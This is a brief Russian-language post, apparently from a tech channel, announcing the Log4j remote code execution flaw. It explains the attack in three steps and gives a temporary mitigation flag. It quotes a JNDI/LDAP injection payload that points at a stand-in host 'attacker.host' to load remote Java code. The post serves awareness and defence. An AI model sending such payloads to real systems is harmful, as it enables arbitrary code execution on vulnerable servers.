У половины интернета нашли выполнение произвольного кода через Log4j. Выглядит это так: 1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться. 2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host 3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код. Гроб. Гроб. Кладбище. Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true” Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).